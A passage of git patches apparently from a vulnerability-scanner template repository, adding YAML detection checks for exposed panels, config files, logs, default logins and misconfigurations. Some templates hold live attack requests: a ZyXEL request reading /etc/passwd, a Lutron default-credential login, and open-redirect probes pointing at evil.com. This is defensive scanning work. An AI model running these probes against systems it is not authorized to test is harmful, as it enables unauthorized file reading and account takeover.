<8293321+ehsandeep@users.noreply.github.com> Date: Wed, 14 Dec 2022 11:57:06 +0530 Subject: [PATCH 1281/1415] matcher update --- cves/2018/CVE-2018-17422.yaml | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml index 487f59d925..d1a6a87da4 100644 --- a/cves/2018/CVE-2018-17422.yaml +++ b/cves/2018/CVE-2018-17422.yaml @@ -23,20 +23,15 @@ info: requests: - method: GET path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh' + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' stop-at-first-match: true - matchers-condition: and matchers: - - type: word part: body words: - - "self.location = 'http://www.interact.sh'" - - - type: status - status: - - 200 + - "self.location = 'http://evil.com'" + - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" # Enhanced by md on 2022/10/13 From 8c8a2c26010d23a875d953c021431fc4772271f0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 14:14:26 +0530 Subject: [PATCH 1282/1415] Create lutron-default-login.yaml --- .../lutron/lutron-default-login.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 default-logins/lutron/lutron-default-login.yaml diff --git a/default-logins/lutron/lutron-default-login.yaml b/default-logins/lutron/lutron-default-login.yaml new file mode 100644 index 0000000000..a641e5b470 --- /dev/null +++ b/default-logins/lutron/lutron-default-login.yaml @@ -0,0 +1,34 @@ +id: lutron-default-login + +info: + name: Lutron Device Default Login + author: geeknik + severity: high + reference: + - https://www.lutron.com + - https://vulners.com/openvas/OPENVAS:1361412562310113206 + tags: default-login,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/login?login=lutron&password=lutron" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "LUTRON" + - "DeviceIP" + - "Get Database Info as XML" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 1d16c832b765eade2bde0841d191d37e2d2e5a1d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 14:46:47 +0530 Subject: [PATCH 1283/1415] Create pagespeed-detect.yaml --- technologies/pagespeed-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/pagespeed-detect.yaml diff --git a/technologies/pagespeed-detect.yaml b/technologies/pagespeed-detect.yaml new file mode 100644 index 0000000000..9a42a0632c --- /dev/null +++ b/technologies/pagespeed-detect.yaml @@ -0,0 +1,21 @@ +id: pagespeed-detect + +info: + name: Pagespeed Detection + author: geeknik + severity: info + metadata: + verified: "true" + shodan-query: "X-Mod-Pagespeed:" + tags: tech,pagespeed + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: header + words: + - "X-Mod-Pagespeed:" From 7bd3904182e6ddbdf8537e8800872a1857541b5a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 14:49:56 +0530 Subject: [PATCH 1284/1415] Update pagespeed-detect.yaml --- technologies/pagespeed-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/pagespeed-detect.yaml b/technologies/pagespeed-detect.yaml index 9a42a0632c..c6692accbf 100644 --- a/technologies/pagespeed-detect.yaml +++ b/technologies/pagespeed-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: verified: "true" - shodan-query: "X-Mod-Pagespeed:" + shodan-query: "X-Mod-Pagespeed:" tags: tech,pagespeed requests: From ffe7382c6bd5f43b9014d75865f5389ec23d39ac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 15:03:01 +0530 Subject: [PATCH 1285/1415] Create sony-bravia-disclosure.yaml --- misconfiguration/sony-bravia-disclosure.yaml | 39 ++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 misconfiguration/sony-bravia-disclosure.yaml diff --git a/misconfiguration/sony-bravia-disclosure.yaml b/misconfiguration/sony-bravia-disclosure.yaml new file mode 100644 index 0000000000..99fe66474a --- /dev/null +++ b/misconfiguration/sony-bravia-disclosure.yaml @@ -0,0 +1,39 @@ +id: sony-bravia-disclosure + +info: + name: Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure + author: geeknik + severity: medium + description: | + The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php + - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt + tags: sony,unauth,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/api/system' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"contentsServer":' + - '"networkInterfaces":' + - '"serverTime":' + - '"hostIp":' + condition: and + + - type: word + part: header + words: + - "text/plain" + - "application/json" + condition: or + + - type: status + status: + - 200 From 762e24b7b941dfecc63e18490403175e6b4d179f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 15:13:47 +0530 Subject: [PATCH 1286/1415] Create vernemq-status-page.yaml --- misconfiguration/vernemq-status-page.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/vernemq-status-page.yaml diff --git a/misconfiguration/vernemq-status-page.yaml b/misconfiguration/vernemq-status-page.yaml new file mode 100644 index 0000000000..40cea4dbca --- /dev/null +++ b/misconfiguration/vernemq-status-page.yaml @@ -0,0 +1,29 @@ +id: vernemq-status-page + +info: + name: VerneMQ Status Page + author: geeknik + severity: low + reference: + - https://github.com/vernemq/vernemq + tags: vernemq,misconfig,status + +requests: + - method: GET + path: + - '{{BaseURL}}/status' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'VerneMQ Status' + - 'Issues' + - 'Cluster Overview' + - 'Node Status' + condition: and + + - type: status + status: + - 200 From 72a4f807f6308a69cf8761fb173e79d4f907de6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 15:55:48 +0530 Subject: [PATCH 1287/1415] Create unauth-zwave-mqtt.yaml --- misconfiguration/unauth-zwave-mqtt.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 misconfiguration/unauth-zwave-mqtt.yaml diff --git a/misconfiguration/unauth-zwave-mqtt.yaml b/misconfiguration/unauth-zwave-mqtt.yaml new file mode 100644 index 0000000000..2f1f6ca9be --- /dev/null +++ b/misconfiguration/unauth-zwave-mqtt.yaml @@ -0,0 +1,29 @@ +id: unauth-zwave-mqtt + +info: + name: Unauthenticated ZWave To MQTT Console + author: geeknik + severity: low + reference: + - https://github.com/OpenZWave/Zwave2Mqtt + metadata: + verified: "true" + shodan-query: title:"ZWave To MQTT" + tags: zwave,mqtt,health + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ZWave To MQTT' + - 'content="Zwavejs2Mqtt"' + condition: and + + - type: status + status: + - 200 From fdb21c1820fc76f77afe5a6a25acdc63906d58c6 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 14 Dec 2022 11:36:22 +0100 Subject: [PATCH 1288/1415] Add files via upload --- exposed-panels/spark-panel.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/spark-panel.yaml diff --git a/exposed-panels/spark-panel.yaml b/exposed-panels/spark-panel.yaml new file mode 100644 index 0000000000..c57248d7b6 --- /dev/null +++ b/exposed-panels/spark-panel.yaml @@ -0,0 +1,33 @@ +id: spark-panel + +info: + name: SPARK Panel - Detect + author: righettod + severity: info + description: SPARK panel was detected + reference: + - https://www.hypeinnovation.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: html:"/apps/IMT/Html/" + tags: panel,spark + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "url=servlet/hype" + + - type: status + status: + - 200 From 317d0dc38356a1bb6fa32b7da61b94845a2acadc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 00:55:43 +0530 Subject: [PATCH 1289/1415] Update insecure-firebase-database.yaml --- misconfiguration/google/insecure-firebase-database.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/misconfiguration/google/insecure-firebase-database.yaml b/misconfiguration/google/insecure-firebase-database.yaml index bb269ae48f..40ce987534 100644 --- a/misconfiguration/google/insecure-firebase-database.yaml +++ b/misconfiguration/google/insecure-firebase-database.yaml @@ -32,6 +32,11 @@ requests: words: - '{"id":"insecure-firebase-database"}' + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 From 4b0a3b14dd45b24a60020170c287fabad266e953 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 01:04:06 +0530 Subject: [PATCH 1290/1415] Create websheets-config.yaml --- exposures/configs/websheets-config.yaml | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/configs/websheets-config.yaml diff --git a/exposures/configs/websheets-config.yaml b/exposures/configs/websheets-config.yaml new file mode 100644 index 0000000000..348419cabd --- /dev/null +++ b/exposures/configs/websheets-config.yaml @@ -0,0 +1,28 @@ +id: websheets-config + +info: + name: Websheets Config File Exposure + author: geeknik + severity: low + reference: + - https://github.com/daveagp/websheets + tags: websheets,config,exposure,files + +requests: + - method: GET + path: + - '{{BaseURL}}/ws-config.json' + - '{{BaseURL}}/ws-config.example.json' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - '"db-password":' + - '"db-database":' + condition: and + + - type: status + status: + - 200 From f48dd3523e6727f60e3bb2914353f5d1a9baa52e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 01:13:29 +0530 Subject: [PATCH 1291/1415] Create salesforce-credentials.yaml --- exposures/files/salesforce-credentials.yaml | 34 +++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposures/files/salesforce-credentials.yaml diff --git a/exposures/files/salesforce-credentials.yaml b/exposures/files/salesforce-credentials.yaml new file mode 100644 index 0000000000..30f65b0413 --- /dev/null +++ b/exposures/files/salesforce-credentials.yaml @@ -0,0 +1,34 @@ +id: salesforce-credentials + +info: + name: Salesforce Credentials Disclosure + author: geeknik + severity: unknown + reference: + - https://github.com/daveagp/websheets + tags: exposure,files,salesforce,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/js/salesforce.js' + - '{{BaseURL}}/salesforce.js' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'jsforce.Connection' + - 'conn.login' + - 'conn.query' + condition: and + + - type: word + part: header + words: + - "text/plain" + + - type: status + status: + - 200 From 9fe49d27f3e792bedbdf95af6ecc8b1dc59b9a3c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 01:24:41 +0530 Subject: [PATCH 1292/1415] Create production-log.yaml --- exposures/logs/production-log.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 exposures/logs/production-log.yaml diff --git a/exposures/logs/production-log.yaml b/exposures/logs/production-log.yaml new file mode 100644 index 0000000000..a850457a1b --- /dev/null +++ b/exposures/logs/production-log.yaml @@ -0,0 +1,41 @@ +id: production-log + +info: + name: Production Log File Disclosure + author: geeknik + severity: low + metadata: + verified: "true" + github-query: filename:production.log Connecting to database specified by database.yml + tags: exposure,files,logs,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/log/production.log' + - '{{BaseURL}}/logs/production.log' + - '{{BaseURL}}/production.log' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'Connecting to database specified by database.yml' + + - type: word + part: header + words: + - 'text/html' + negative: true + + - type: status + status: + - 200 + + extractors: + - type: regex + name: last_modified + part: header + regex: + - 'Last-Modified:.*' From 38af9e6717cf1a592833f555136d1ee3128e5431 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 14:07:45 +0530 Subject: [PATCH 1293/1415] Update credential-exposure.yaml --- file/keys/credential-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/file/keys/credential-exposure.yaml b/file/keys/credential-exposure.yaml index 94a0bd6093..26000e60c2 100644 --- a/file/keys/credential-exposure.yaml +++ b/file/keys/credential-exposure.yaml @@ -718,3 +718,4 @@ file: - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" + - "(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|=)+" From 7f138159cf13dbb8f96c43547c7c5900519505a4 Mon Sep 17 00:00:00 2001 From: bigzeroo <39177268+bigzeroo@users.noreply.github.com> Date: Thu, 15 Dec 2022 17:56:30 +0800 Subject: [PATCH 1294/1415] Create mautic-Unauthorized-upgrade Unauthorized access to the mautic web page access http://x.x.x.x/upgrade.php Online upgrade, upgrade failure will cause mautic business interruption. --- mautic-Unauthorized-upgrade | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 mautic-Unauthorized-upgrade diff --git a/mautic-Unauthorized-upgrade b/mautic-Unauthorized-upgrade new file mode 100644 index 0000000000..3ef3fc8a29 --- /dev/null +++ b/mautic-Unauthorized-upgrade @@ -0,0 +1,34 @@ +id: mautic-Unauthorized-upgrade + +info: + name: Mautic Upgrade.php Exposure + author: huowuzhao + severity: high + description: | + Unauthorized access to the mautic web page access http://x.x.x.x/upgrade.php Online upgrade, upgrade failure will cause mautic business interruption. + metadata: + verified: true + tags: misconfig,mautic,upgrade + +requests: + - method: GET + path: + - '{{BaseURL}}/upgrade.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Upgrade Mautic' + - 'Click here to start upgrade' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From ee562e420d9623ffa7cf892d9c5ef2ed574ea116 Mon Sep 17 00:00:00 2001 From: EvergreenCartoons <113829980+EvergreenCartoons@users.noreply.github.com> Date: Thu, 15 Dec 2022 13:32:26 +0000 Subject: [PATCH 1295/1415] Create zyxel-exportlog-lfd.yaml --- .../zyxel/zyxel-exportlog-lfd.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml diff --git a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml new file mode 100644 index 0000000000..bfc4a5514c --- /dev/null +++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml @@ -0,0 +1,30 @@ +id: zyxel-exportlog-lfd + +info: + name: Multiple ZyXEL routers local file disclosure. + author: EvergreenCartoons + severity: critical + description: | + Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. + reference: + - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ + - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ + - https://github.com/rapid7/metasploit-framework/pull/17388 + tags: zyxel,lfd,msf + +requests: + - raw: + - | + GET /Export_Log?/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: */* + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From ab7e15245e388d34e200f3fb58c3ff4740e9aff9 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 19:04:33 +0530 Subject: [PATCH 1296/1415] Add files via upload --- miscellaneous/sitemap-detect.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 miscellaneous/sitemap-detect.yaml diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml new file mode 100644 index 0000000000..f5d0bf70d4 --- /dev/null +++ b/miscellaneous/sitemap-detect.yaml @@ -0,0 +1,28 @@ +id: sitemap-detect + +info: Detect Sitemap + name: + author: houdinis + severity: info + description: | + A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. + tags: misc,generic + +requests: + - method: GET + path: + - "{{BaseURL}}/sitemap.xml" + - "{{BaseURL}}/sitemap.xsl" + + matchers-condition: and + host-redirects: true + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sitemap" + - "Sitemap" + condition: or \ No newline at end of file From 22a4393d52c90c04119954bc22a6d2c2ec293711 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 19:07:21 +0530 Subject: [PATCH 1297/1415] Update sitemap-detect.yaml --- miscellaneous/sitemap-detect.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index f5d0bf70d4..f49341274e 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -1,11 +1,11 @@ id: sitemap-detect -info: Detect Sitemap - name: +info: + name: Detect Sitemap author: houdinis severity: info description: | - A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. + A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. tags: misc,generic requests: @@ -25,4 +25,4 @@ requests: words: - "sitemap" - "Sitemap" - condition: or \ No newline at end of file + condition: or From 0254e94690acdf09be5b1e75f5c29673f34f6255 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 19:10:12 +0530 Subject: [PATCH 1298/1415] Update sitemap-detect.yaml --- miscellaneous/sitemap-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index f49341274e..baaa2e741b 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -1,7 +1,7 @@ id: sitemap-detect info: - name: Detect Sitemap + name: Detect Sitemap author: houdinis severity: info description: | From 33afc71bb2b19e4002386f0c2fc114cea92c6d58 Mon Sep 17 00:00:00 2001 From: EvergreenCartoons <113829980+EvergreenCartoons@users.noreply.github.com> Date: Thu, 15 Dec 2022 13:40:38 +0000 Subject: [PATCH 1299/1415] fucking yamllint doing me over --- vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml index bfc4a5514c..8746ff45fe 100644 --- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml +++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml @@ -5,7 +5,7 @@ info: author: EvergreenCartoons severity: critical description: | - Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. + Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ From 8cb89ed42f2a4cb80129f668cb662a38f0b9ddcb Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 22:36:12 +0530 Subject: [PATCH 1300/1415] Add files via upload --- network/detection/mysql-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 network/detection/mysql-detect.yaml diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml new file mode 100644 index 0000000000..5ce90b9d47 --- /dev/null +++ b/network/detection/mysql-detect.yaml @@ -0,0 +1,25 @@ +id: mysql-detect + +info: + name: Mysql Detection + author: pussycat0x + severity: info + description: | + MySQL is a tool used to manage databases and servers, so while it's not a database, it's widely used in relation to managing and organising data in databases. + metadata: + verified: true + shodan-query: product:"MySQL" + tags: network,mysql,db + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:3306" + matchers: + - type: word + words: + - "mysql" + condition: and \ No newline at end of file From 123fd36395eb33ed6c87ba5c8cd2848e149c6275 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 15 Dec 2022 22:49:32 +0530 Subject: [PATCH 1301/1415] Tag -Update --- cves/2022/CVE-2022-25082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-25082.yaml b/cves/2022/CVE-2022-25082.yaml index 73b7b3ecec..86f6c9d801 100644 --- a/cves/2022/CVE-2022-25082.yaml +++ b/cves/2022/CVE-2022-25082.yaml @@ -14,7 +14,7 @@ info: cvss-score: 9.8 cve-id: CVE-2022-25082 cwe-id: CWE-77 - tags: totolink,cve,cve2022,router,unauth,rce + tags: totolink,cve,cve2022,router,unauth,rce,iot requests: - raw: From 951fb550986e7f81fa6fabe099e55f2cb89f3397 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 15 Dec 2022 23:38:21 +0530 Subject: [PATCH 1302/1415] Update and rename mautic-Unauthorized-upgrade to misconfiguration/unauth-mautic-upgrade.yaml --- .../unauth-mautic-upgrade.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) rename mautic-Unauthorized-upgrade => misconfiguration/unauth-mautic-upgrade.yaml (57%) diff --git a/mautic-Unauthorized-upgrade b/misconfiguration/unauth-mautic-upgrade.yaml similarity index 57% rename from mautic-Unauthorized-upgrade rename to misconfiguration/unauth-mautic-upgrade.yaml index 3ef3fc8a29..a92abfcb63 100644 --- a/mautic-Unauthorized-upgrade +++ b/misconfiguration/unauth-mautic-upgrade.yaml @@ -1,14 +1,13 @@ -id: mautic-Unauthorized-upgrade +id: unauth-mautic-upgrade info: - name: Mautic Upgrade.php Exposure + name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao severity: high - description: | - Unauthorized access to the mautic web page access http://x.x.x.x/upgrade.php Online upgrade, upgrade failure will cause mautic business interruption. metadata: - verified: true - tags: misconfig,mautic,upgrade + verified: "true" + shodan-query: title:"Mautic" + tags: misconfig,unauth,mautic requests: - method: GET @@ -27,7 +26,7 @@ requests: - type: word part: header words: - - "text/html" + - 'text/html' - type: status status: From e91252b017cc86ced1b370f3b4283ee0aab247e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 00:19:44 +0530 Subject: [PATCH 1303/1415] Update unauth-mautic-upgrade.yaml --- misconfiguration/unauth-mautic-upgrade.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-mautic-upgrade.yaml b/misconfiguration/unauth-mautic-upgrade.yaml index a92abfcb63..b9f68ed484 100644 --- a/misconfiguration/unauth-mautic-upgrade.yaml +++ b/misconfiguration/unauth-mautic-upgrade.yaml @@ -3,7 +3,7 @@ id: unauth-mautic-upgrade info: name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao - severity: high + severity: unknown metadata: verified: "true" shodan-query: title:"Mautic" From ca4689db8d509c829e6d266be2a8e7bd679b449d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Dec 2022 00:26:18 +0530 Subject: [PATCH 1304/1415] reverted severity --- misconfiguration/unauth-mautic-upgrade.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/unauth-mautic-upgrade.yaml b/misconfiguration/unauth-mautic-upgrade.yaml index b9f68ed484..a92abfcb63 100644 --- a/misconfiguration/unauth-mautic-upgrade.yaml +++ b/misconfiguration/unauth-mautic-upgrade.yaml @@ -3,7 +3,7 @@ id: unauth-mautic-upgrade info: name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao - severity: unknown + severity: high metadata: verified: "true" shodan-query: title:"Mautic" From 13f9a338d3c58a041c5db295b35d5409f0edfac2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 00:31:01 +0530 Subject: [PATCH 1305/1415] minor-update-fix-fp --- ...ortlog-lfd.yaml => unauth-lfd-zhttpd.yaml} | 19 +++++++++++++------ 1 file changed, 13 insertions(+), 6 deletions(-) rename vulnerabilities/zyxel/{zyxel-exportlog-lfd.yaml => unauth-lfd-zhttpd.yaml} (67%) diff --git a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml similarity index 67% rename from vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml rename to vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 8746ff45fe..04680ed0c1 100644 --- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -1,16 +1,17 @@ -id: zyxel-exportlog-lfd +id: unauth-lfd-zhttpd info: - name: Multiple ZyXEL routers local file disclosure. + name: Unauthenticated Local File Disclosure in zhttpd author: EvergreenCartoons - severity: critical - description: | - Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. + severity: high reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ - https://github.com/rapid7/metasploit-framework/pull/17388 - tags: zyxel,lfd,msf + metadata: + verified: "true" + shodan-query: http.html:"VMG1312-B10D" + tags: misconfig,unauth,zyxel requests: - raw: @@ -18,6 +19,7 @@ requests: GET /Export_Log?/etc/passwd HTTP/1.1 Host: {{Hostname}} Accept: */* + matchers-condition: and matchers: - type: regex @@ -25,6 +27,11 @@ requests: regex: - "root:.*:0:0:" + - type: word + part: header + words: + - 'application/octet-stream' + - type: status status: - 200 From 87d7bde9dfa2f76ad8f0e16b35bd6568ccac87cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 00:42:12 +0530 Subject: [PATCH 1306/1415] Update unauth-lfd-zhttpd.yaml --- vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 04680ed0c1..e2f115ef84 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -4,6 +4,8 @@ info: name: Unauthenticated Local File Disclosure in zhttpd author: EvergreenCartoons severity: high + description: | + An endpoint in zhttpd can be used to expose system files including "/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior login. An attacker can read all files on the system by using this endpoint. reference: - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/ - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/ From 04e7a7a7dc20ebea83d710fda172d86ccca8c03e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 01:02:06 +0530 Subject: [PATCH 1307/1415] minor-update --- miscellaneous/sitemap-detect.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index baaa2e741b..55b1179104 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -1,7 +1,7 @@ id: sitemap-detect info: - name: Detect Sitemap + name: Sitemap Detection author: houdinis severity: info description: | @@ -14,15 +14,14 @@ requests: - "{{BaseURL}}/sitemap.xml" - "{{BaseURL}}/sitemap.xsl" - matchers-condition: and host-redirects: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "sitemap" - - "Sitemap" - condition: or + case-insensitive: true + + - type: status + status: + - 200 From 2acf351d4f27048b97bc34a208f8edeb472a8d26 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 16 Dec 2022 01:10:43 +0530 Subject: [PATCH 1308/1415] major-update --- miscellaneous/sitemap-detect.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/miscellaneous/sitemap-detect.yaml b/miscellaneous/sitemap-detect.yaml index 55b1179104..ced3ce9a39 100644 --- a/miscellaneous/sitemap-detect.yaml +++ b/miscellaneous/sitemap-detect.yaml @@ -6,15 +6,19 @@ info: severity: info description: | A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. - tags: misc,generic + metadata: + verified: "true" + google-query: 